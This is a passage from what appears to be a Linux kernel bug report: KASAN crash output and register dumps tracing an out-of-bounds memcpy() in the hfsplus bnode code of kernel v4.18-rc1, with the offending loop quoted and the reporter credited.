bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.886915] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.888448] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.889903] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.891341] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.892780] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.894234] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.895683] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.905583] ---[ end trace 7f5a46c7478f1297 ]--- [ 278.906815] RIP: 0010:__memcpy+0x12/0x20 [ 278.907624] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 278.911448] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246 [ 278.912514] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200 [ 278.913989] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000 [ 278.915422] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499 [ 278.916845] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000 [ 278.918316] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000 [ 278.919754] FS: 00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 278.921366] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.922571] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L152 while ((len -= l) != 0) { l = min_t(int, len, PAGE_SIZE); memcpy(kmap(*++dst_page), kmap(*++src_page), l); kunmap(*src_page); set_page_dirty(*dst_page); kunmap(*dst_page); } The out-of-bound access happens in this memcpy() as KASAN reports. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.